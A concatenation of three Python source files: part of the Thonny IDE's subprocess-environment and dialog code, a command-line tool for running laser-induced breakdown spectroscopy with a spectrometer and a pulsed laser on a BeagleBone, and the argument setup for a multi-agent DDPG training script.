del env[key]
else:
assert isinstance(overrides[key], str)
if key.upper() == "PATH":
update_system_path(env, overrides[key])
else:
env[key] = overrides[key]
return env
def get_environment_overrides_for_python_subprocess(target_executable):
"""Take care of not not confusing different interpreter
with variables meant for bundled interpreter"""
# At the moment I'm tweaking the environment only if current
# exe is bundled for Thonny.
# In remaining cases it is user's responsibility to avoid
# calling Thonny with environment which may be confusing for
# different Pythons called in a subprocess.
this_executable = sys.executable.replace("pythonw.exe", "python.exe")
target_executable = target_executable.replace("pythonw.exe", "python.exe")
interpreter_specific_keys = [
"TCL_LIBRARY",
"TK_LIBRARY",
"LD_LIBRARY_PATH",
"DYLD_LIBRARY_PATH",
"SSL_CERT_DIR",
"SSL_CERT_FILE",
"PYTHONHOME",
"PYTHONPATH",
"PYTHONNOUSERSITE",
"PYTHONUSERBASE",
]
result = {}
if os.path.samefile(
target_executable, this_executable
) or is_venv_interpreter_of_current_interpreter(target_executable):
# bring out some important variables so that they can
# be explicitly set in macOS Terminal
# (If they are set then it's most likely because current exe is in Thonny bundle)
for key in interpreter_specific_keys:
if key in os.environ:
result[key] = os.environ[key]
# never pass some variables to different interpreter
# (even if it's venv or symlink to current one)
if not is_same_path(target_executable, this_executable):
for key in ["PYTHONPATH", "PYTHONHOME", "PYTHONNOUSERSITE", "PYTHONUSERBASE"]:
if key in os.environ:
result[key] = None
else:
# interpreters are not related
# interpreter specific keys most likely would confuse other interpreter
for key in interpreter_specific_keys:
if key in os.environ:
result[key] = None
# some keys should be never passed
for key in [
"PYTHONSTARTUP",
"PYTHONBREAKPOINT",
"PYTHONDEBUG",
"PYTHONNOUSERSITE",
"PYTHONASYNCIODEBUG",
]:
if key in os.environ:
result[key] = None
# venv may not find (correct) Tk without assistance (eg. in Ubuntu)
if is_venv_interpreter_of_current_interpreter(target_executable):
try:
if "TCL_LIBRARY" not in os.environ or "TK_LIBRARY" not in os.environ:
result["TCL_LIBRARY"] = get_workbench().tk.exprstring("$tcl_library")
result["TK_LIBRARY"] = get_workbench().tk.exprstring("$tk_library")
except Exception:
logging.exception("Can't compute Tcl/Tk library location")
return result
def construct_cd_command(path) -> str:
return construct_cmd_line(["%cd", path])
_command_id_counter = 0
def generate_command_id():
global _command_id_counter
_command_id_counter += 1
return "cmd_" + str(_command_id_counter)
class BlockingDialog(CommonDialogEx):
def __init__(self, master, cmd, title, mode="indeterminate"):
super().__init__(master)
self.title(title)
self.response = None
self._sent_interrupt = False
self._mode = mode
self._cmd_id = cmd["id"]
description = cmd.get("description", " ")
self._description_label = ttk.Label(self.main_frame, text=description)
self._description_label.grid(row=0, column=0, padx=10, pady=10, sticky="new")
self._progress_bar = ttk.Progressbar(self.main_frame, mode=self._mode, length=200)
self._progress_bar.grid(row=1, column=0, padx=10, sticky="new")
self._progress_bar.start()
self._cancel_button = ttk.Button(
self.main_frame, text=tr("Cancel"), command=self._on_cancel
)
self._cancel_button.grid(row=2, column=0, padx=10, pady=10)
self._start_time = time.time()
if isinstance(cmd, InlineCommand):
get_workbench().bind("InlineResponse", self._on_response, True)
get_workbench().bind("InlineProgress", self._on_progress, True)
else:
raise NotImplementedError()
def _on_response(self, event):
self.response = event
if event.get("command_id") == self._cmd_id:
self.destroy()
def _on_progress(self, event):
if event.get("command_id") != self._cmd_id:
return
if self._mode == "indeterminate":
self._progress_bar.stop()
self._mode = "determinate"
self._progress_bar.configure(mode=self._mode)
if event.get("description"):
self._description_label.configure(text=event.get("description"))
self._progress_bar.configure(maximum=event["maximum"], value=event["value"])
def _send_interrupt(self):
self._sent_interrupt = True
self._description_label.configure(text="Cancelling...")
self._cancel_button.configure(text=tr("Close"))
get_runner()._cmd_interrupt()
def on_close(self, event=None):
self._on_cancel()
def _on_cancel(self):
if self._sent_interrupt:
if messagebox.askyesno(
"Interrupt again?",
"Do you want to close this dialog without waiting cancelling to complete?",
):
self.destroy()
else:
self._send_interrupt()
else:
if messagebox.askyesno(
"Cancel current operation?", "Do you really want to cancel this operation?"
):
self._send_interrupt()
def destroy(self):
get_workbench().unbind("InlineResponse", self._on_response)
get_workbench().unbind("InlineProgress", self._on_progress)
super().destroy()
def get_frontend_python():
# TODO: deprecated (name can be misleading)
warnings.warn("get_frontend_python is deprecated")
return get_interpreter_for_subprocess(sys.executable)
def get_interpreter_for_subprocess(candidate=None):
if candidate is None:
candidate = sys.executable
pythonw = candidate.replace("python.exe", "pythonw.exe")
if not _console_allocated and os.path.exists(pythonw):
return pythonw
else:
return candidate.replace("pythonw.exe", "python.exe")
|
libs_cli.py
|
#!/usr/bin/python3
"""
libs_cli.py
This is a command line interface to run a minimal LIBS test using an OceanOptics FLAME-T spectrometer and a 1064nm MicroJewel laser. This code is designed to be
run on a BeagleBone Black.
"""
import struct
import pathlib
import readline
import threading
from argparse import ArgumentParser
import time
import pickle
import platform
import serial
import serial.tools.list_ports
import binascii
import math
import seabreeze
seabreeze.use('cseabreeze') # Select the cseabreeze backend for consistency
from seabreeze.spectrometers import Spectrometer
from seabreeze.cseabreeze._wrapper import SeaBreezeError
if platform.system() == "Linux":
import Adafruit_BBIO.GPIO as GPIO
else:
from gpio_spoof import DummyGPIO as GPIO # This is for debugging purposes
from ujlaser.lasercontrol import Laser, LaserCommandError
running = True
verbose = False
spectrometer = None
laser = None
devices = []
command_log = None # File handle to the log file that we will store list of command queries
SD_CARD_PATH = './sample/' # needs to be set before testing
LOG_PATH = "logs/"
SAMPLES_PATH = "samples/"
# Global settings variables
laserSingleShot = True
sample_mode = "NORMAL"
external_trigger_pin = "P8_26"
integration_time = 6000
def check_laser(laser, complain=True):
"""Helper function that prints an error message if the laser has not been connected yet. Returns True if the laser is NOT connected."""
    if laser is None:
if complain:
print_cli("!!! This command requires the laser to be connected! Use 'laser connect' first!")
return True
return False
def check_spectrometer(spec, complain=True):
"""Helper function that prints an error message if the spectrometer has not been connected yet. Returns True if the spectrometer is NOT connected."""
    if spec is None:
        if complain:
            print_cli("!!! This command requires the spectrometer to be connected! Use 'spectrometer connect' first!")
return True
return False
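# Reads a list of FLAME-T configuration registers over raw USB and prints each
# address/value pair in hex (0x6B appears to be the register-query opcode here).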
def dump_settings_register(spec):
print_cli("... Dumping settings register:")
for i in (b'\x00', b'\x04', b'\x08', b'\x0C', b'\x10', b'\x14', b'\x18', b'\x28', b'\x2C', b'\x38', b'\x3C', b'\x40', b'\x48', b'\x50', b'\x54', b'\x74', b'\x78', b'\x7C', b'\x80'):
spec.f.raw_usb_bus_access.raw_usb_write(struct.pack(">ss",b'\x6B',i),'primary_out')
output = spec.f.raw_usb_bus_access.raw_usb_read(endpoint='primary_in', buffer_length=3)
print_cli((binascii.hexlify(i)).decode("ascii") + "\t" + (binascii.hexlify(output[1:])).decode("ascii"))
def query_settings(spec):
print_cli("Querying Spectrometer Settings...")
spec.f.raw_usb_bus_access.raw_usb_write(struct.pack(">s",b'\xFE'),'primary_out')
output = spec.f.raw_usb_bus_access.raw_usb_read(endpoint='primary_in', buffer_length=16)
pixel_count, integration_time, lamp_enable, trigger_mode, spectral_status, spectra_packets, power_down, packet_count, comm_speed = struct.unpack("<HI?BcB?BxxBx", output)
print_cli("Pixel Count: " + str(pixel_count))
print_cli("Integration_time: " + str(integration_time))
print_cli("Lamp Enable: " + str(lamp_enable))
print_cli("Trigger Mode: " + str(trigger_mode))
print_cli("Spectrum Status: " + str(spectral_status))
print_cli("Spectra packets: " + str(spectra_packets))
print_cli("Power Down Flags: " + str(power_down))
print_cli("Packet Count: " + str(packet_count))
print_cli("USB Speed: " + str(comm_speed))
def auto_connect_spectrometer():
"""Use seabreeze to autodetect and connect to a spectrometer. Returns a Spectrometer object on success, None otherwise"""
global devices
if devices == []:
devices = seabreeze.spectrometers.list_devices()
if devices != []:
try:
spec = seabreeze.spectrometers.Spectrometer(devices[0])
print_cli("*** Found spectrometer, serial number: " + spec.serial_number)
return spec
except SeaBreezeError as e:
print_cli("!!! " + str(e))
except:
print_cli("Unknown Error")
print_cli("!!! No spectrometer autodetected!")
def load_data(filename):
"""Prints the data in files. Not added in yet"""
with open(SD_CARD_PATH+filename, 'rb') as file:
data = pickle.load(file)
print_cli(data)
def save_sample_csv(filename, wavelengths, intensities):
debug_log("Saving sample as CSV: " + filename + "; len(wavelengths) = " + len(wavelengths) + ", len(intensities) = " + len(intensities))
with open(filename, "w") as f:
f.write("Wavelengths,Intensities\n")
        for i in range(len(wavelengths)):
            f.write(str(wavelengths[i]) + "," + str(intensities[i]) + "\n")
def user_select_port():
ports = serial.tools.list_ports.comports()
if len(ports) == 0:
print_cli("No serial ports detected!")
return
print_cli("\t0) Cancel")
for i,p in enumerate(ports):
print_cli("\t" + str(i+1) + ") " + str(p))
try:
i = input("Select a port or 0 to cancel: ")
log_input(i)
i = int(i)
except ValueError:
i = -1
if i == 0:
return
if i < 0 or i > len(ports):
print_cli("Invalid entry, please try again.")
return user_select_port()
else:
return ports[i-1].device
# Please use the below function when printing to the command line. This will both print to the command line and print it to the log file.
def cli_print(txt):
global command_log
command_log.write(str(int(time.time())) + ">: " + txt + "\n")
print(txt)
# This is a helper function because I'm REALLY lazy and don't feel like getting Python's runtime errors. I know this is an atrocity. Not sorry.
def print_cli(txt):
cli_print(txt)
# Print to the log file. Will print to CLI if verbose mode is enabled.
def debug_log(txt):
global command_log, verbose
command_log.write(str(time.time()) + "D:" + txt + "\n")
if verbose:
print("D: " + txt)
# Writes user input/commands to the command log file.
def log_input(txt):
global command_log
command_log.write(str(int(time.time())) + "?:" + txt + "\n")
def set_trigger_delay(spec, t):
"""Sets the trigger delay of the spectrometer. Can be from 0 to 32.7ms in increments of 500ns. t is in microseconds"""
global sample_mode
if sample_mode == "NORMAL":
software_trigger_delay = t
else:
        t_nano_seconds = t * 1000  # convert micro->nano seconds
        t_clock_cycles = t_nano_seconds // 500  # number of clock cycles to wait; 500ns per cycle b/c the delay clock runs at 2MHz
data = struct.pack("<ssH",b'\x6A',b'\x28',t_clock_cycles)
spec.f.raw_usb_bus_access.raw_usb_write(data,'primary_out')
# self.spec.f.spectrometer.set_delay_microseconds(t)
def set_external_trigger_pin(pin):
"""Sets the GPIO pin to use for external triggering."""
global external_trigger_pin
GPIO.setup(pin, GPIO.OUT)
external_trigger_pin = pin
def set_sample_mode(spec, mode):
    """Sets the spectrometer sampling trigger to the specified mode."""
    global sample_mode
i = None
# TODO: Verify that these are the correct modes. The datasheets are vague.
# ^ should be correct for the seabreeze library v1.1.0 (at least 0 and 3 should be which are the ones that matter)
if mode == "NORMAL":
sample_mode = mode
i = 0
elif mode == "EXT_EDGE": #NOTE: EXT_EDGE and EXT_SYNC are not implemented here because the laser only has edge triggering
sample_mode = mode
i = 3
else:
print_cli("!!! Invalid mode!")
return False
try:
spec.trigger_mode(i)
print_cli("*** Spectrometer trigger mode set to " + mode + " (" + str(i) + ")")
return True
except SeaBreezeError as e:
print_cli("!!! " + str(e))
print_cli("!!! Spectrometer does not support mode number " + str(i) + " (" + mode + ")!")
return False
def set_integration_time(spec, time):
"""Sets the integration time of the spectrometer. Returns True on success, False otherwise."""
global integration_time
spec.integration_time_micros(time)
integration_time = time
print_cli("*** Integration time set to " + str(time) + " microseconds.")
return True
def do_trigger(pin):
GPIO.output(pin, GPIO.LOW)
time.sleep(0.01) # delay for spectrum, can be removed or edited if tested
GPIO.output(pin, GPIO.HIGH)
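# Module-level buffers used to hand the acquired spectrum from the sampling
# thread (_spectrometer_callback) back to do_sample().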
_wavelengths = None
_intensities = None
def _spectrometer_callback(spec):
global _wavelengths, _intensities
print_cli("Spectrometer callback")
_wavelengths, _intensities = spec.spectrum()
time.sleep(2)
def do_sample(spec, laser):
"""Performs a LIBS sample using the current spectrometer and laser settings."""
global sample_mode, _wavelengths, _intensities, integration_time
wavelengths = []
intensities = []
if sample_mode == "EXT_EDGE":
do_trigger(pin)
elif sample_mode == "NORMAL":
print_cli("Begninning sampling, clearing spectrometer FIFO...")
spec.integration_time_micros(6000) # Decrease integration time so we clear the FIFO faster
spec.spectrum()
spec.spectrum()
spec.spectrum()
print_cli("Setting integration time to " + str(integration_time) + "microseconds")
spec.integration_time_micros(integration_time)
time.sleep(0.5)
        spectrometer_thread = threading.Thread(target=_spectrometer_callback, name="spec-sample-thread", args=(spec,))
spectrometer_thread.start()
try:
laser.fire()
except LaserCommandError as e:
print_cli("!!! ERROR encountered while firing laser: " + str(e))
return None
spectrometer_thread.join()
        # The laser is fired while the spectrometer thread integrates, so the plasma emission lands inside the integration window.
else: # no other modes planning to be used
print_cli("This mode is currently unavailable, please try EXT_EDGE or NORMAL mode.")
return
print_cli("Sample finished, saving data...")
timestamp = str(time.time()) # gets time immediately after integrating
data = _wavelengths, _intensities
with open(SAMPLES_PATH + str(timestamp) + "_SAMPLE.pickle", 'ab') as file:
pickle.dump(data, file)
print_cli("Sample saved.")
# Takes a sample from the spectrometer without the laser firing
def get_spectrum(spec):
wavelengths, intensities = spec.spectrum()
timestamp = time.time()
timestamp = str(timestamp)
data = wavelengths, intensities
filename = "SAMPLE_" + timestamp + ".pickle"
f = input("Save sample as [" + filename + "]:")
log_input(f)
if f != "":
filename = f
with open("samples/" + filename, 'ab') as file:
pickle.dump(data, file)
#save_sample_csv("samples/" + filename, wavelengths, intensities)
def give_status(spec, l):
"""Prints out a status report of the spectrometer and laser. Also saves the report to a file"""
s = "Status at: " + str(time.time()) + "\n"
if check_spectrometer(spec, False):
s += "Spectrometer is not connected.\n"
else:
s += "Spectrometer\n\t"
s += "Model-ID:\n\t"
s += "Spectrometer:\n\t"
s += "Sample Mode:\n"
s + "\n"
if check_laser(l, False):
s += "Laser is not connected.\n"
else:
s += "Laser:\n"
s += str(l.get_status())
cli_print(s)
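# Interactive command loop. Commands follow a rough "<instrument> <action> [property] [value]"
# grammar, e.g. "laser set rep_rate 10" or "spectrometer set integration_time 6000".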
def command_loop():
global running, spectrometer, laser, external_trigger_pin, laserSingleShot, sample_mode, integration_time
# make the below global variables? currently moved to here since it seems unnecessary
integration_time = 6000 # This is the default value the spectrometer is set to
mode = "NORMAL"
    software_trigger_delay = 0  # software-mode trigger delay in microseconds (stored by 'spectrometer set trigger_delay'; not yet applied during sampling)
while running:
c = input("?").strip() # Get a command from the user and remove any extra whitespace
log_input("?" + c)
parts = c.split() # split the command up into the command and any arguments
if c == "help": # check to see what command we were given
give_help()
elif c == "spectrometer spectrum":
if check_spectrometer(spectrometer):
continue
get_spectrum(spectrometer)
elif c == "spectrometer dump_registers":
if check_spectrometer(spectrometer):
continue
dump_settings_register(spectrometer)
elif c == "spectrometer query_settings":
if check_spectrometer(spectrometer):
continue
query_settings(spectrometer)
elif parts[0:3] == ["spectrometer","set","trigger_delay"]:
if check_spectrometer(spectrometer):
continue
if len(parts) < 4:
print_cli("!!! Invalid command: Set Trigger Delay command expects at least 1 argument.")
continue
try:
t = int(parts[3]) # t is the time in microseconds to delay
set_trigger_delay(spectrometer, t)
software_trigger_delay = t
except ValueError:
print_cli("!!! Invalid argument: Set Trigger Delay command expected an integer.")
continue
elif parts[0:3] == ["spectrometer","set","integration_time"]:
if check_spectrometer(spectrometer):
continue
if len(parts) < 4:
print_cli("!!! Invalid command: Set Integration Time command expects at least 1 argument.")
continue
try:
t = int(parts[3])
set_integration_time(spectrometer, t)
except ValueError:
print_cli("!!! Invalid argument: Set Integration Time command expected an integer!")
continue
except SeaBreezeError as e:
print_cli("!!! " + str(e))
continue
elif parts[0:3] == ["spectrometer","set","sample_mode"]:
if check_spectrometer(spectrometer):
continue
if len(parts) < 4:
print_cli("!!! Invalid command: Set Sample Mode command expects at least 1 argument.")
continue
if parts[3] == "NORMAL" or parts[3] == "EXT_LEVEL" or parts[3] == "EXT_SYNC" or parts[3] == "EXT_EDGE":
set_sample_mode(spectrometer, parts[3])
mode = parts[3]
else:
print_cli("!!! Invalid argument: Set Sample Mode command expected one of: NORMAL, EXT_SYNC, EXT_LEVEL, EXT_EDGE")
continue
elif c == "spectrometer get integration_time":
if check_spectrometer(spectrometer):
continue
print_cli("Spectrometer integration time set to " + str(integration_time) + " microseconds.")
continue
elif c == "status":
give_status(spectrometer, laser)
continue
elif parts[0:4] == ["set","external_trigger_pin"]:
if len(parts) < 3:
print_cli("!!! Invalid command: Set external trigger pin command expects at least 1 argument.")
continue
            try:
                pin = parts[2]
                if not (pin.startswith("P8_") or pin.startswith("P9_")):
                    raise ValueError("Invalid pin!")
                set_external_trigger_pin(pin)
                external_trigger_pin = pin
            except Exception:
cli_print("!!! " + pin + " is not a valid pin name! Should follow format such as: P8_22 or P9_16 (these are examples).")
continue
elif c == "get external_trigger_pin":
print_cli("External trigger pin is set to: " + external_trigger_pin)
continue
elif parts[0:3] == ["spectrometer","connect"]:
if len(parts) == 2:
spectrometer = auto_connect_spectrometer()
elif len(parts) == 3:
spectrometer = connect_spectrometer(parts[2])
elif c == "laser connect":
port = user_select_port()
if not port:
cli_print("!!! Aborting connect laser.")
continue
laser = Laser()
print_cli("Connecting to laser...")
laser.connect(port)
print_cli("Refreshing settings...")
laser.refresh_parameters()
s = laser.get_status()
if not s:
cli_print("!!! Failed to connect to laser!")
continue
cli_print("Laser Status:")
cli_print("ID: " + laser.get_laser_ID() + "\n")
cli_print(str(s))
print_cli("Rep rate: " + str(laser.repRate) + "Hz")
print_cli("Pulse width: " + str(laser.pulseWidth) + "s")
print_cli("Pulse mode: " + str(laser.pulseMode))
print_cli("Burst count: " + str(laser.burstCount))
elif c == "laser arm":
if check_laser(laser):
continue
try:
if laser.arm():
print_cli("*** Laser ARMED")
except LaserCommandError as e:
print_cli("!!! Error encountered while arming laser: " + str(e))
continue
elif c == "laser disarm":
if check_laser(laser):
continue
try:
if laser.disarm():
print_cli("*** Laser DISARMED")
except LaserCommandError as e:
print_cli("!!! Error encountered while disarming laser: " + str(e))
continue
elif c == "laser status":
if check_laser(laser):
print_cli("Laser is not connected.")
continue
s = laser.get_status()
print_cli(str(s))
print_cli("Rep rate: " + str(laser.repRate) + "Hz")
print_cli("Pulse width: " + str(laser.pulseWidth) + "s")
print_cli("Pulse mode: " + str(laser.pulseMode))
print_cli("Burst count: " + str(laser.burstCount))
elif c == "laser fire":
if check_laser(laser):
continue
laser.fire()
elif c == "laser stop":
if check_laser(laser):
continue
laser.emergency_stop()
elif parts[0:3] == ["laser","set","rep_rate"]: # TODO: Add check to see if this is within the repetition rate.
if check_laser(laser):
continue
if len(parts) < 4:
print_cli("!!! Set Laser Rep Rate expects a number argument!")
continue
try:
rate = float(parts[3])
if rate < 0:
raise ValueError("Repetition Rate must be positive!")
laser.set_repetition_rate(rate)
except ValueError:
print_cli("!!! Set Laser Rep Rate expects a positive float argument! You did not enter a float value!")
continue
except LaserCommandError as e:
print_cli("!!! Error encountered while commanding laser! " + str(e))
continue
elif parts[0:3] == ["laser", "get", "rep_rate"]:
if check_laser(laser):
continue
try:
r = laser.get_repetition_rate()
print_cli("Laser repetition rate set to: " + str(r) + "Hz")
except LaserCommandError as e:
print_cli("!!! Error encountered while commanding laser! " + str(e))
continue
elif parts[0:3] == ["laser", "get", "pulse_mode"]:
if check_laser(laser):
continue
try:
r = laser.get_pulse_mode()
s = "UNKOWN"
if r == 0:
s = "CONTINUOUS"
elif r == 1:
s = "SINGLE"
elif r == 2:
s = "BURST"
print_cli("Laser is set to fire in " + s + " mode.")
except LaserCommandError as e:
print_cli("!!! Error encountered while commanding laser! " + str(e))
continue
elif parts[0:3] == ["laser","set","pulse_mode"]:
if check_laser(laser):
continue
if len(parts) < 4:
print_cli("!!! Set Laser Pulse Mode expects one of the following arguments: CONTINUOUS, SINGLE, BURST!")
continue
else:
if parts[3] == "CONTINUOUS":
laser.set_pulse_mode(0)
laserSingleShot = True
elif parts[3] == "SINGLE":
laser.set_pulse_mode(1)
laserSingleShot = True
elif parts[3] == "BURST":
laser.set_pulse_mode(2)
laserSingleShot = False
elif parts[0:3] == ["laser","set","burst_count"]:
if check_laser(laser):
continue
if len(parts) < 4:
print_cli("!!! Set Laser Burst Count expects an integer argument!")
continue
if laser.pulseMode != 2:
print_cli("!!! Please set Laser Pulse Mode to BURST before setting the burst count!")
continue
try:
burst_count = int(parts[3])
if burst_count < 0:
raise ValueError("Burst Count must be positive!")
laser.set_burst_count(burst_count)
except ValueError:
print_cli("!!! Set Laser Burst Count expects a positive integer argument! You did not enter an integer.")
continue
elif parts[0:3] == ["laser", "get", "burst_count"]:
if check_laser(laser):
continue
try:
r = laser.get_burst_count()
print_cli("Laser set to " + str(r) + " pulses per sample")
except LaserCommandError as e:
print_cli("!!! Error encountered while commanding laser! " + str(e))
elif parts[0:3] == ["laser","set","pulse_width"]:
if check_laser(laser):
continue
if len(parts) < 4:
print_cli("!!! Set Laser Pulse Width expects a positive float argument!")
continue
try:
width = float(parts[3])
laser.set_pulse_width(width)
except ValueError:
print_cli("!!! Set Laser Pulse Width expects a float argument! You did not enter a float.")
continue
except LaserCommandError as e:
print_cli("!!! Error encountered while commanding laser! " + str(e))
continue
elif parts[0:3] == ["laser", "get", "pulse_width"]:
if check_laser(laser):
continue
try:
r = laser.get_pulse_width()
except LaserCommandError as e:
print_cli("!!! Error while commanding laser: " + str(e))
continue
if not r:
print_cli("!!! Error while querying the laser for pulse width!")
continue
print_cli("Laser pulse width is set to: " + str(r))
elif parts[0:3] == ["laser","get","fet_temp"]:
if check_laser(laser):
continue
t = laser.get_fet_temp()
print_cli("Laser FET temperature: " + str(t))
elif parts[0:3] == ["laser", "get", "shot_count"]:
shot_count = laser.get_system_shot_count()
print_cli("The laser shot count is at " + str(shot_count) + " shots.")
elif parts[0:3] == ["laser", "get", "diode_current"]:
diode_current = laser.get_diode_current()
print_cli("The laser's diode current is " + str(diode_current) + " Amps")
elif c == "do_libs_sample":
if check_laser(laser) or check_spectrometer(spectrometer):
continue
try:
do_sample(spectrometer, laser)
except SeaBreezeError as e:
print_cli("!!! " + str(e))
continue
except LaserCommandError as e:
print_cli("!!! Error while commanding laser! " + str(e))
elif c == "do_trigger":
do_trigger(external_trigger_pin)
print_cli("Triggered " + external_trigger_pin + ".")
elif c == "exit" or c == "quit":
if spectrometer:
spectrometer.close()
if laser:
laser.disconnect()
running = False
else:
print_cli("!!! Invalid command. Enter the 'help' command for usage information")
# Root commands allow the user to specify which instrument (laser or spectrometer) they are interacting with, or interact with other aspects of the program
ROOT_COMMANDS = ["help", "exit", "quit", "laser", "spectrometer", "set", "get", "status", "do_libs_sample", "do_trigger"]
# Actions are things that the user can do to the laser and spectrometer
SPECTROMETER_ACTIONS = ["spectrum", "set", "get", "connect", "status", "dump_registers", "query_settings"]
LASER_ACTIONS = ["connect", "status", "arm", "disarm", "fire", "set", "get", "stop"]
# Properties are things that can be get and/or set by the user
SPECTROMETER_PROPERTIES = ["sample_mode", "trigger_delay", "integration_time"]
LASER_PROPERTIES = ["diode_current", "fet_temp", "pulse_width", "rep_rate", "pulse_mode", "burst_count", "shot_count"]
ROOT_PROPERTIES = ["external_trigger_pin"]
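# readline tab-completion: first resolve the root command, then suggest actions
# for that instrument, then properties for "get"/"set".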
def tab_completer(text, state):
text = readline.get_line_buffer()
parts = text.split(" ")
root = None
action = None
prop = None
if parts[0] in ROOT_COMMANDS:
root = parts[0]
if len(parts) > 1:
if root == "laser":
if parts[1] in LASER_ACTIONS:
action = parts[1]
elif root == "spectrometer":
if parts[1] in SPECTROMETER_ACTIONS:
action = parts[1]
elif root == "set":
root = None
action = "set"
elif root == "get":
root = None
action = "get"
if root == None:
if action == "get" or action == "set": # Getter and setter actions for root properties
            if len(parts) < 2:
                parts.append("")
            for p in ROOT_PROPERTIES:
                if p.startswith(parts[1]):
                    if not state:
                        return p
                    else:
                        state -= 1
else:
for cmd in ROOT_COMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
elif not action and root == "laser":
        if len(parts) < 2:
            parts.append("")
for a in LASER_ACTIONS:
if a.startswith(parts[1]):
if not state:
return a
else:
state -= 1
elif not action and root == "spectrometer":
        if len(parts) < 2:
            parts.append("")
for a in SPECTROMETER_ACTIONS:
if a.startswith(parts[1]):
if not state:
return a
else:
state -= 1
elif action in ["get", "set"] and root == "laser":
        if len(parts) < 3:
            parts.append("")
for p in LASER_PROPERTIES:
if p.startswith(parts[2]):
if not state:
return p
else:
state -= 1
elif action in ["get", "set"] and root == "spectrometer":
        if len(parts) < 3:
            parts.append("")
for p in SPECTROMETER_PROPERTIES:
if p.startswith(parts[2]):
if not state:
return p
else:
state -= 1
else:
return
def laser_help(section = "root"):
print("Laser help section")
def spectrometer_help(section = "root"):
print("Spectrometer help section")
def give_help():
"""Outputs a list of commands to the user for use in interactive mode."""
print("\nInteractive Mode Commands")
def main():
global command_log, external_trigger_pin
parser = ArgumentParser(description="CLI for performing LIBS using an Ocean Optics FLAME-T spectrometer and a 1064nm Quantum Composers MicroJewel laser.",
epilog="Created for the 2020 NASA BIG Idea challenge, Penn State Oasis team. Questions: tylersengia@gmail.com",
prog="libs_cli.py")
parser.add_argument('--version', action='version', version='%(prog)s 0.1')
parser.add_argument("--spec-dev", "-s", help="Specify the USB device for the spectrometer. Default is autodetected by seabreeze.", nargs=1, default=None)
parser.add_argument("--laser-dev", "-l", help="Specify the USB device for the laser.", nargs=1, default=None)
parser.add_argument("--config", "-c", help="Read test configuration from the specified JSON file.", nargs=1, default=None)
parser.add_argument("--no-interact", "-n", help="Do not run in interactive mode. Usually used when a pre-written test configuration file is being used.", dest="interactive", action="store_false", default=True)
a = parser.parse_args()
    pathlib.Path(LOG_PATH).mkdir(parents=True, exist_ok=True)  # make sure the log directory exists
    command_log = open(LOG_PATH + "LOG_" + str(int(time.time())) + ".log", "w")
GPIO.setup(external_trigger_pin, GPIO.OUT)
GPIO.output(external_trigger_pin, GPIO.HIGH)
if a.interactive:
readline.parse_and_bind("tab: complete")
readline.set_completer(tab_completer)
command_loop()
GPIO.cleanup()
command_log.close()
if __name__ == "__main__":
main()
|
main_vec.py
|
import argparse
import math
from collections import namedtuple
from itertools import count
import numpy as np
from eval import eval_model_q
import copy
import torch
from ddpg_vec import DDPG
from ddpg_vec_hetero import DDPGH
import random
from replay_memory import ReplayMemory, Transition
from utils import *
import os
import time
from utils import n_actions, copy_actor_policy
from ddpg_vec import hard_update
import torch.multiprocessing as mp
from multiprocessing import Queue
from multiprocessing.sharedctypes import Value
import sys
parser = argparse.ArgumentParser(description='PyTorch REINFORCE example')
parser.add_argument('--scenario', required=True,
help='name of the environment to run')
parser.add_argument('--gamma', type=float, default=0.95, metavar='G',
                    help='discount factor for reward (default: 0.95)')
parser.add_argument('--tau', type=float, default=0.01, metavar='G',
                    help='soft update coefficient for the target networks (default: 0.01)')
parser.add_argument('--ou_noise', type=bool, default=True)
parser.add_argument('--param_noise', type=bool, default=False)
parser.add_argument('--train_noise', default=False, action='store_true')
parser.add_argument('--noise_scale', type=float, default=0.3, metavar='G',
help='initial noise scale (default: 0.3)')
parser.add_argument('--final_noise_scale', type=float, default=0.3, metavar='G',
help='final noise scale (default: 0.3)')
parser.add_argument('--exploration_end', type=int, default=60000, metavar='N',
                    help='number of episodes with noise (default: 60000)')
parser.add_argument('--seed', type=int, default=9, metavar='N',
                    help='random seed (default: 9)')
parser.add_argument('--batch_size', type=int, default=1024, metavar='N',
                    help='batch size (default: 1024)')
parser.add_argument('--num_steps', type=int, default=25, metavar='N',
                    help='max episode length (default: 25)')
parser.add_argument('--num_episodes', type=int, default=60000, metavar='N',
                    help='number of episodes (default: 60000)')
parser.add_argument('--hidden_size', type=int, default=128, metavar='N',
                    help='hidden layer size (default: 128)')
parser.add_argument('--updates_per_step', type=int, default=8, metavar='N',
                    help='actor updates per update interval (default: 8)')
parser.add_argument('--critic_updates_per_step', type=int, default=8, metavar='N',
                    help='critic updates per update interval (default: 8)')
parser.add_argument('--replay_size', type=int, default=1000000, metavar='N',
                    help='size of replay buffer (default: 1000000)')
parser.add_argument('--actor_lr', type=float, default=1e-2,
                    help='actor learning rate (default: 1e-2)')
parser.add_argument('--critic_lr', type=float, default=1e-2,
                    help='critic learning rate (default: 1e-2)')
parser.add_argument('--fixed_lr', default=False, action='store_true')
parser.add_argument('--num_eval_runs', type=int, default=1000, help='number of runs per evaluation (default: 1000)')
parser.add_argument("--exp_name", type=str, help="name of the experiment")
parser.add_argument("--save_dir", type=str, default="./ckpt_plot",
help="directory in which training state and model should be saved")
parser.add_argument('--static_env', default=False, action='store_true')
parser.add_argument('--critic_type', type=str, default='mlp', help="Supports [mlp, gcn_mean, gcn_max]")
parser.add_argument('--actor_type', type=str, default='mlp', help="Supports [mlp, gcn_max]")
parser.add_argument('--critic_dec_cen', default='cen')
parser.add_argument("--env_agent_ckpt", type=str, default='ckpt_plot/simple_tag_v5_al0a10_4/agents.ckpt')
parser.add_argument('--shuffle', default=None, type=str, help='None|shuffle|sort')
parser.add_argument('--episode_per_update', type=int, default=4, metavar='N',
                    help='episodes per training update (default: 4)')
parser.add_argument('--episode_per_actor_update', type=int, default=4)
parser.add_argument('--episode_per_critic_update', type=int, default=4)
parser.add_argument('--steps_per_actor_update', type=int, default=100)
parser.add_argument('--steps_per_critic_update', type=int, default=100)
#parser.add_argument('--episodes_per_update', type=int, default=4)
parser.add_argument('--target_update_mode', default='soft', help='soft | hard | episodic')
parser.add_argument('--cuda', default=False, action='store_true')
parser.add_argument('--eval_freq', type=int, default=1000)
args = parser.parse_args()
if args.exp_name is None:
args.exp_name = args.scenario + '_' + args.critic_type + '_' + args.target_update_mode + '_hiddensize' \
+ str(args.hidden_size) + '_' + str(args.seed)
print("=================Arguments==================")
for k, v in args.__dict__.items():
print('{}: {}'.format(k, v))
print("========================================")
torch.set_num_threads(1)
device = torch.device("cuda:0" if torch.cuda.is_available() and args.cuda else "cpu")
